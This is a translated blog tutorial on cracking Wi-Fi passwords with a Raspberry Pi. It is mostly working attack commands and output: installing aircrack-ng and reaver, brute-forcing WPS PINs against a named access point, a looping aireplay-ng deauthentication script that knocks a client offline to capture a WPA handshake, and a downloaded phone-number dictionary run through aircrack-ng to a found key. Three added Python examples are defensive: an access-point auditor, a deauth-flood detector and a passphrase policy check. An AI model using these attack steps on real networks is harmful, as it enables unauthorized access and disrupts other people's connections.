Cracking Wi-Fi with a Raspberry Pi


Author: lingyun  Source: 凌云物网智科实验室 (Lingyun IoT Lab)  Date: 2017-08-09

Build and install

Install the dependencies

sudo aptitude install build-essential libnl-3-200 libnl-3-dev libnl-genl-3-200 libnl-genl-3-dev libsqlite3-0 libsqlite3-dev libpcap0.8 libpcap-dev libpcap0.8-dev -y

Install aircrack-ng

wget https://coding.net/u/sfantree/p/self_use_OSS/git/raw/master/source/aircrack-ng-1.2-rc4.tar.gz
tar -zxvf aircrack-ng-1.2-rc4.tar.gz
cd aircrack-ng-1.2-rc4
make -j
sudo make install DESTDIR=/usr/local/aircrack-ng

Install reaver

wget ftp://mirrors.ustc.edu.cn/gentoo/distfiles/reaver-1.4.tar.gz
tar -zxvf reaver-1.4.tar.gz    # extract the archive first, otherwise the cd below fails
cd reaver-1.4/src
./configure --prefix=/usr/local/reaver
make -j
sudo mkdir -p /usr/local/reaver/bin    # "-p" belongs to mkdir, not to sudo
sudo make install

Add the environment variables

# /etc/profile.d is root-owned, so write through sudo tee; quote EOF so that $PATH
# is stored literally and expanded at login rather than frozen at the time of writing
sudo tee /etc/profile.d/hackwifi.sh << 'EOF'
export PATH=$PATH:/usr/local/reaver/bin:/usr/local/aircrack-ng/usr/local/bin:/usr/local/aircrack-ng/usr/local/sbin
EOF

Scanning

Put the chosen wireless NIC into monitor mode; an adapter with an 8187 or 3070 chipset is recommended.

ifconfig |grep wlan|awk '{print $1}'
sudo airmon-ng start wlan1
ifconfig|grep mon|awk '{print $1}'

Scan all nearby access points

$ sudo airodump-ng wlan1mon

 CH  4 ][ Elapsed: 0 s ][ 2017-07-31 16:14                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 08:10:77:00:00:00  -59        2        0    0   6  54e  WPA2 CCMP   PSK  Netcore                     
 04:95:E6:00:00:00  -63        2        0    0   4  54e  WPA2 CCMP   PSK  Tenda              
 CC:81:DA:00:00:00  -63        3        0    0   3  54e. WPA2 CCMP   PSK  Mass

PIN brute-force cracking

This exploits the WPS vulnerability: after at most about 11,000 attempts the WPA password is obtained, with a success rate of nearly 100%. In the Wi-Fi list from the scan above, a dot after 54e indicates that WPS is enabled, and the PIN can be obtained with this method.

sudo reaver -i wlan1mon -b CC:81:DA:00:00:00 -a -S -vv -d2 -t 5 -c 3

More detailed usage of the parameters can be seen in the help output of reaver -h.
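The post reads the trailing dot in the MB column of the scan output as a WPS indicator. An operator auditing their own access points wants that check automated, so the following is an added example (not code from the post or from the aircrack-ng project) that parses the AP table exactly as airodump-ng prints it and reports owned APs that advertise the flag or run open/WEP encryption. Two caveats a practitioner should keep in mind: the airodump-ng manual documents the dot as the short-preamble flag and offers an explicit WPS column when run with --wps, so treat the dot as a hint to confirm rather than proof; and most current APs lock WPS after a handful of failed PIN attempts, so the cure is simply disabling WPS. The sample table and the fourth (open) row are constructed; the BSSIDs are the masked values from the post.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
AUTH_VALUES = {"PSK", "MGT", "SKA", "OPN"}   # values airodump-ng prints in the AUTH column

# Constructed sample in airodump-ng's layout; first three rows mirror the post's scan.
SAMPLE_SCAN = """\
 CH  4 ][ Elapsed: 0 s ][ 2017-07-31 16:14

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 08:10:77:00:00:00  -59        2        0    0   6  54e  WPA2 CCMP   PSK  Netcore
 04:95:E6:00:00:00  -63        2        0    0   4  54e  WPA2 CCMP   PSK  Tenda
 CC:81:DA:00:00:00  -63        3        0    0   3  54e. WPA2 CCMP   PSK  Mass
 AA:BB:CC:00:00:00  -70        1        0    0  11  54   OPN              Guest
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    mb: str                  # MB column as printed, e.g. "54e."
    enc: str
    cipher: Optional[str]
    auth: Optional[str]
    essid: str

    @property
    def mb_dot_flag(self) -> bool:
        # The trailing dot the post treats as "WPS on"; verify with airodump-ng --wps.
        return self.mb.endswith(".")


def parse_airodump(text: str) -> List[AccessPoint]:
    """Parse the AP table; station rows (second table) are recognised by their header and skipped."""
    aps: List[AccessPoint] = []
    mb_idx: Optional[int] = None          # column index of MB, None while inside the station table
    for line in text.splitlines():
        cols = line.split()
        if not cols:
            continue
        if cols[0] == "BSSID":
            # The AP header has an ESSID column, the station header does not.
            mb_idx = cols.index("MB") if "ESSID" in cols else None
            continue
        if mb_idx is None or len(cols) <= mb_idx + 1 or not MAC_RE.match(cols[0]):
            continue
        enc = cols[mb_idx + 1]
        rest = cols[mb_idx + 2:]
        cipher = auth = None
        if enc != "OPN" and rest:           # open networks print no CIPHER/AUTH
            cipher = rest.pop(0)
            if rest and rest[0] in AUTH_VALUES:
                auth = rest.pop(0)
        aps.append(AccessPoint(
            bssid=cols[0].upper(),
            channel=int(cols[mb_idx - 1]),
            mb=cols[mb_idx],
            enc=enc,
            cipher=cipher,
            auth=auth,
            essid=" ".join(rest),
        ))
    return aps


def audit_owned_aps(aps: List[AccessPoint], owned: Set[str]) -> List[Tuple[str, str]]:
    """Findings for the APs the operator owns (by BSSID); everything else is ignored."""
    findings: List[Tuple[str, str]] = []
    for ap in aps:
        if ap.bssid not in owned:
            continue
        if ap.mb_dot_flag:
            findings.append((ap.bssid, "MB dot flag set: confirm with --wps and disable WPS"))
        if ap.enc in ("OPN", "WEP"):
            findings.append((ap.bssid, f"{ap.enc} network: move to WPA2-AES or WPA3"))
    return findings


if __name__ == "__main__":
    for bssid, msg in audit_owned_aps(parse_airodump(SAMPLE_SCAN),
                                      {"CC:81:DA:00:00:00", "AA:BB:CC:00:00:00"}):
        print(bssid, msg)
```

In practice the input is the text airodump-ng writes with -w (or a terminal capture), and the owned set comes from the site's asset inventory.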

Handshake capture and cracking

Capturing the handshake applies more widely, but the captured handshake carries only hashed material, so a brute-force search is still needed to match the corresponding password.

$ sudo airodump-ng --ivs --bssid FC:D7:33:00:00:00 -w hack.cap -c 9 wlan1mon

CH  9 ][ Elapsed: 36 s ][ 2017-07-31 18:09                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:3A:35:00:00:00  -56   0       74      577    0   9  54e  WPA2 CCMP   PSK  Tenda   

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                       

 C8:3A:35:00:00:00  74:72:B0:00:00:00   -1   11e- 0      0      538                               
 C8:3A:35:00:00:00  50:C8:E5:00:00:00  -53    0 - 6    718      106

Open another terminal window and send deauth frames to break the connection between the client and the access point.

#!/bin/bash
while ((1));do
    sudo aireplay-ng -0 3 -a C8:3A:35:00:00:00  -c 50:C8:E5:00:00:00 wlan1mon
    sleep 25
done

Clients usually reconnect to the access point automatically, and the authentication exchange during reconnection is easy for airodump-ng to capture. To keep this process repeating, with enough time between two attacks, I wrote the shell loop above.

18:37:53  Waiting for beacon frame (BSSID: C8:3A:35:00:00:00) on channel 9
18:37:59  Sending 64 directed DeAuth. STMAC: [50:C8:E5:00:00:00] [ 7| 0 ACKs]
18:38:00  Sending 64 directed DeAuth. STMAC: [50:C8:E5:00:00:00] [ 5| 0 ACKs]
18:38:01  Sending 64 directed DeAuth. STMAC: [50:C8:E5:00:00:00] [ 0| 0 ACKs]

After each attack the #Data count keeps increasing; once enough frames have been collected (roughly 1.8k), the top right of the airodump-ng screen shows WPA handshake and you can stop capturing.

CH  9 ][ Elapsed: 11 mins ][ 2017-07-31 18:38 ][ WPA handshake: C8:3A:35:00:00:00             

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:3A:35:00:00:00  -65   0      823     2285    9   9  54e  WPA2 CCMP   PSK  Tenda    

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                       

 C8:3A:35:00:00:00  74:72:B0:00:00:00   -1   11e- 0      0      174                               
 C8:3A:35:00:00:00  50:C8:E5:00:00:00  -57    2e- 6     31    10935  Tenda          
 C8:3A:35:00:00:00  80:ED:2C:00:00:00  -63    1e- 1     17      264                               
 C8:3A:35:00:00:00  84:11:9E:00:00:00   -1    5e- 0      0        9
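The deauth loop above is visible on the air: the aireplay-ng output shows 64 directed deauthentication frames per round, whereas a legitimate disconnect produces one. A wireless IDS keys on exactly that burst. The following is an added example, not code from the post, of the detection logic: a sliding-window counter per (AP, station) pair that raises one alert when forged deauth/disassoc frames exceed a threshold. The frame records are constructed here from the masked addresses in the post; in a live deployment they would come from a monitor-mode capture. The real mitigation is 802.11w (Protected Management Frames), which authenticates deauth and disassoc frames so clients discard forged ones; WPA3 requires it.

```python
from collections import deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Optional, Set, Tuple

# IEEE 802.11 management frame subtype values
BEACON, DISASSOC, DEAUTH = 8, 10, 12

# Assumed addresses for the constructed sample (masked values from the post)
AP = "C8:3A:35:00:00:00"
STA_TARGET = "50:C8:E5:00:00:00"
STA_OTHER = "80:ED:2C:00:00:00"


@dataclass(frozen=True)
class MgmtFrame:
    ts: float      # capture timestamp in seconds
    subtype: int   # management subtype
    bssid: str     # AP address the frame claims to come from
    dst: str       # destination station, or broadcast


class DeauthFloodDetector:
    """Alert once per (bssid, station) pair when more than `threshold`
    deauth/disassoc frames arrive within a sliding window of `window` seconds.
    One deauth is normal; dozens per second is a forged flood."""

    def __init__(self, threshold: int = 10, window: float = 5.0) -> None:
        self.threshold = threshold
        self.window = window
        self._hist: Dict[Tuple[str, str], Deque[float]] = {}
        self._alerted: Set[Tuple[str, str]] = set()

    def feed(self, frame: MgmtFrame) -> Optional[str]:
        if frame.subtype not in (DEAUTH, DISASSOC):
            return None
        key = (frame.bssid.upper(), frame.dst.upper())
        q = self._hist.setdefault(key, deque())
        q.append(frame.ts)
        while q and frame.ts - q[0] > self.window:   # expire old timestamps
            q.popleft()
        if len(q) > self.threshold and key not in self._alerted:
            self._alerted.add(key)
            return (f"deauth flood: {len(q)} frames from {key[0]} to {key[1]} "
                    f"within {self.window}s (t={frame.ts:.2f})")
        return None


def build_sample_frames() -> List[MgmtFrame]:
    """Constructed traffic: beacons, one legitimate deauth for a client that
    roamed away, then a burst of 64 forged deauths as aireplay-ng -0 1 sends."""
    frames = [MgmtFrame(float(t), BEACON, AP, "FF:FF:FF:FF:FF:FF") for t in range(10)]
    frames.append(MgmtFrame(1.5, DEAUTH, AP, STA_OTHER))
    frames += [MgmtFrame(5.0 + i * 0.01, DEAUTH, AP, STA_TARGET) for i in range(64)]
    return sorted(frames, key=lambda f: f.ts)


def run_detector(frames: List[MgmtFrame], threshold: int = 10, window: float = 5.0) -> List[str]:
    det = DeauthFloodDetector(threshold, window)
    alerts: List[str] = []
    for f in frames:
        alert = det.feed(f)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in run_detector(build_sample_frames()):
        print(line)
```

The threshold and window are tuning knobs: a busy AP with many short-lived clients sees a handful of deauths per minute, never dozens in one second to one station.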

Running the dictionary

There is usually more than one cap file in the directory, and only the last one still holds the handshake. Once you have the handshake file, the next step is running a dictionary against it. Doing this on the Raspberry Pi is not recommended; copy the handshake file to a more powerful host instead.

aircrack-ng -w dict.txt Tenda.cap-05.ivs

I wrote a script that generates the mobile phone numbers of a given city. Large cities usually have many number prefixes; for example, the txt file generated below for Wuhan is over 200 MB.

wget https://github.com/sfantree/mobile-password-dictionary/raw/master/phonedict.py
python phonedict.py
Please input the PinYing of your Province:hubei
Please input the PinYing of your City:wuhan

Result: on a low-spec Tencent Cloud instance the test ran at about 1.8k keys/s; a typical mining rig can reach roughly 200k keys/s.

                        Aircrack-ng 1.2 rc4

      [00:05:10] 550244/1189995 keys tested (1825.27 k/s) 

      Time left: 5 minutes, 50 seconds                          46.24%

                          KEY FOUND! [ 1388613xxxx ]


      Master Key     : 46 47 95 56 E4 69 8D 88 82 96 31 D2 56 37 1B D0 
                       3B 70 64 90 81 AF E5 65 61 BE 67 44 2A 7F 66 69 

      Transient Key  : B3 69 C5 3C E1 86 A6 DE 63 6B 68 D9 82 60 61 8B 
                       CB 01 42 8D 92 35 15 E2 38 EA 6D 55 93 FE 30 00 
                       9C 4B 5A 60 98 32 32 76 4C 2B A0 80 42 1A EE 68 
                       81 11 C9 3D 67 6A 60 B4 31 44 33 02 7C 68 80 4C 

      EAPOL HMAC     : A9 C0 66 3B 81 D6 62 1D 9D 09 3E C9 93 36 B3 45
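The run above exhausts a 1,189,995-key phone-number dictionary in about eleven minutes on a small VM, which is the practical lesson for whoever sets the PSK: a passphrase drawn from a small, guessable set falls to a dictionary regardless of the GPU budget. The following is an added example, not code from the post, of a PSK policy check that rejects phone-number-shaped and digits-only passphrases, together with a worst-case exhaustion estimate at the two rates the post quotes. The mobile-number pattern and the test passphrases are constructed assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed pattern: mainland mobile numbers are 11 digits, "1" then a digit 3-9
CN_MOBILE_RE = re.compile(r"^1[3-9]\d{9}$")

# Rates quoted in the post (keys per second)
RATE_CLOUD_VM = 1825.27
RATE_GPU_RIG = 200_000.0
POST_DICT_KEYS = 1_189_995     # size of the dictionary in the post's aircrack-ng output


@dataclass
class PskVerdict:
    psk: str
    reasons: List[str] = field(default_factory=list)

    @property
    def acceptable(self) -> bool:
        return not self.reasons


def seconds_to_exhaust(keyspace: int, rate_per_s: float) -> float:
    """Worst-case time to try every key at the given rate."""
    return keyspace / rate_per_s


def audit_psk(psk: str, min_len: int = 12) -> PskVerdict:
    """Reject passphrases a phone-number or digits-only dictionary would cover."""
    v = PskVerdict(psk)
    if not 8 <= len(psk) <= 63:
        v.reasons.append("WPA2-PSK passphrases must be 8 to 63 characters")
    if CN_MOBILE_RE.match(psk):
        v.reasons.append("looks like a mobile phone number (covered by a city phone-number dictionary)")
    elif psk.isdigit():
        v.reasons.append("digits only: a 10^n keyspace is enumerated quickly")
    if len(psk) < min_len:
        v.reasons.append(f"shorter than the {min_len}-character minimum")
    return v


def compare_keyspaces() -> Dict[str, Dict[str, float]]:
    """Exhaustion times (seconds) for the post's dictionary versus a random
    12-character passphrase over 62 symbols, at both quoted rates."""
    random_12 = 62 ** 12
    out: Dict[str, Dict[str, float]] = {}
    for name, rate in (("cloud_vm", RATE_CLOUD_VM), ("gpu_rig", RATE_GPU_RIG)):
        out[name] = {
            "phone_dict": seconds_to_exhaust(POST_DICT_KEYS, rate),
            "random_12_alnum": seconds_to_exhaust(random_12, rate),
        }
    return out


if __name__ == "__main__":
    for candidate in ("13886130000", "12345678", "t4K-river-lamp-29!"):
        verdict = audit_psk(candidate)
        print(candidate, "OK" if verdict.acceptable else verdict.reasons)
    for machine, times in compare_keyspaces().items():
        print(machine, {k: f"{t:.3g} s" for k, t in times.items()})
```

The estimate for the phone dictionary on the VM comes out near 652 seconds, matching the post's screen (46% done, 5 minutes 50 seconds left); the random 12-character passphrase needs on the order of 10^16 seconds even on the GPU rig, which is the whole argument for a generated PSK.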